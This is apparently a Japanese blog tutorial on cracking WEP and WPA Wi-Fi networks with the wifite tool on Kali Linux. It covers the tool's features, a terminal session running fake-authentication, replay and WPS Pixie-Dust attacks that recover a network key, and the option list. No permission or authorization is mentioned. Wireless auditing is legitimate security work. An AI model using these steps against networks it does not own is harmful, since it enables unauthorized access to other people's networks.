ハッカーはwifiteでWEP、WPAをクラックする(Kali Linux)
目次
wifiteとは
機能
- 信号強度(dB)でターゲットをソートし、最も近いアクセスポイントから順にクラックする
- 隠れたネットワークのクライアントの認証を自動的に解除し、SSIDを明らかにする
- 攻撃対象を正確に指定するための多数のフィルタ(wep/wpa/both、特定の信号強度以上、チャネルなどカスタマイズ可能な設定(タイムアウト、パケット数/秒など)
- 攻撃する前にMACをランダムなアドレスに変更し、攻撃が完了すると元に戻す「匿名」機能
- キャプチャされたWPAハンドシェイクはすべてwifite.pyのカレントディレクトリにバックアップされます
- スマートなWPA認証解除:すべてのクライアントとブロードキャスト認証の間でサイクルする
- Ctrl+Cで攻撃を停止し、継続、次のターゲットへの移動、クラッキングへのスキップ、終了のオプションが可能
- 終了時にセッションサマリーを表示し、クラックされたキーを表示
- すべてのパスワードを cracked.txt に保存
ツールの場所
ツールと使用方法
┌──(kali__kali)-[~]
└─$ sudo su
sudo: ホスト localhost.localdomain の名前解決ができません: 名前解決に一時的に失敗しました
[sudo] kali のパスワード:
┌──(kali__kali)-[/home/kali]
└─# wifite
. .
.´ . . `. wifite2 2.5.8
: : : () : : : a wireless auditor by derv82
`. ` /\ ´ .´ maintained by kimocoder
` / ´ https://github.com/kimocoder/wifite2
[!] Warning: Recommended app pyrit was not found. install @ https://github.com/JPaulMora/Pyrit/wiki
[!] Warning: Recommended app hcxdumptool was not found. install @ apt install hcxdumptool
[!] Warning: Recommended app hcxpcapngtool was not found. install @ apt install hcxtools
[+] Using wlan0mon already in monitor mode
NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ----- ----- ---- ------
1 x-xx-2G 1 WPA-P 51db no
2 xxxxx-xxxxxx-g 7 WPA-P 43db no
3 xxxxx-xxxxxx-gw 7 WEP 43db no
[+] Scanning. Found 3 target(s), 3 client(s). Ctrl+C when ready
------------------------------------------------
[+] Scanning. Found 3 target(s), 3 client(s). Ctrl+C when ready
NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ----- ----- ---- ------
1 x-xx-2G 1 WPA-P 51db no
2 xxxxx-xxxxxx-g 7 WPA-P 43db no
3 xxxxx-xxxxxx-gw 7 WEP 43db no
[+] Scanning. Found 3 target(s), 3 client(s). Ctrl+C when ready ^C
// ハッキング対象のESSIDの番号を入力します。(例:3)
--- ------------------------- --- ----- ----- ---- ------
NUM ESSID CH ENCR POWER WPS? CLIENT
1 x-xx-2G 1 WPA-P 51db no
2 xxxxx-xxxxxx-g 7 WPA-P 43db no
3 xxxxx-xxxxxx-gw 7 WEP 43db no
[+] select target(s) (1-3) separated by commas, dashes or all: 3
[+] (1/1) Starting attacks against FF:FF:FF:FF:FF:FF (xxxxx-xxxxxx-gw)
[+] attempting fake-authentication with FF:FF:FF:FF:FF:FF... success
[+] xxxxx-xxxxxx-gw (42db) WEP replay: 0/10000 IVs, no-auth, Waiting for packet...
[!] restarting aireplay after 11 seconds of no new IVs
[+] xxxxx-xxxxxx-gw (40db) WEP replay: 1/10000 IVs, no-auth, Waiting for packet...
[!] restarting aireplay after 11 seconds of no new IVs
[+] xxxxx-xxxxxx-gw (42db) WEP replay: 1/10000 IVs, fakeauth, Waiting for packet...
[!] restarting aireplay after 11 seconds of no new IVs
[+] xxxxx-xxxxxx-gw (42db) WEP replay: 17/10000 IVs, fakeauth, Waiting for packet...
[!] restarting aireplay after 11 seconds of no new IVs
[+] xxxxx-xxxxxx-gw (42db) WEP replay: 17/10000 IVs, fakeauth, Waiting for packet...
[!] restarting aireplay after 11 seconds of no new IVs
[+] xxxxx-xxxxxx-gw (40db) WEP replay: 18/10000 IVs, fakeauth, Waiting for packet...
[!] restarting aireplay after 11 seconds of no new IVs
[+] xxxxx-xxxxxx-gw (40db) WEP replay: 18/10000 IVs, fakeauth, Waiting for packet...
:
:
[+] xxxxx-xxxxxx-gw (41db) WEP replay: 10251/10000 IVs, fakeauth, Waiting for packet... and c
[+] xxxxx-xxxxxx-gw (41db) WEP replay: 10251/10000 IVs, fakeauth, Waiting for packet... and c
[+] xxxxx-xxxxxx-gw (42db) WEP replay: 10251/10000 IVs, fakeauth, Waiting for packet... and cracking^C
[!] Interrupted
[+] Next steps:
1: Deauth clients and retry replay attack against xxxxx-xxxxxx-gw
2: Start new fragment attack against xxxxx-xxxxxx-gw
3: Start new chopchop attack against xxxxx-xxxxxx-gw
4: Start new caffelatte attack against xxxxx-xxxxxx-gw
5: Start new p0841 attack against xxxxx-xxxxxx-gw
6: Start new hirte attack against xxxxx-xxxxxx-gw
7: Stop attacking, Move onto next target
[?] Select an option (1-7):
[+] (1/1) Starting attacks against FF:FF:FF:FF:FF:FF (xxxxx-xxxxxx-gw)
[+] xxxxx-xxxxxx-gw (42db) WPS Pixie-Dust: [4m56s] Cracked WPS PIN: 123456789 PSK: zzzzzzzz4e3b8
[+] ESSID: xxxxx-xxxxxx-gw
[+] BSSID: FF:FF:FF:FF:FF:FF
[+] Encryption: WPA (WPS)
[+] WPS PIN: 123456789
[+] PSK/Password: zzzzzzzz4e3b8
[+] saved crack result to cracked.json (1 total)
[+] Finished attacking 1 target(s), exiting
オプション(arguments)
-h, –help
-v, –verbose
-i [interface]
-c [channel]
-inf, –infinite
-mac, –random-mac
-p [scan_time]
–kill
-pow [min_power], –power [min_power]
–skip-crack
-first [attack_max], –first [attack_max]
–clients-only
–nodeauths
–daemon
–wep
–require-fakeauth
–keep-ivs
–wpa
–new-hs
–dict [file]
–wps
–wps-only
–bully
–reaver
–ignore-locks
–pmkid
–no-pmkid
–pmkid-timeout [sec]
–cracked
–check [file]
–crack
YouTubeに最新動画を掲載しました。
wifiteツールのまとめ
- aireplay attack
- fragment attack
- chopchop attack
- caffelatte attack
- p0841 attack
- hirte attack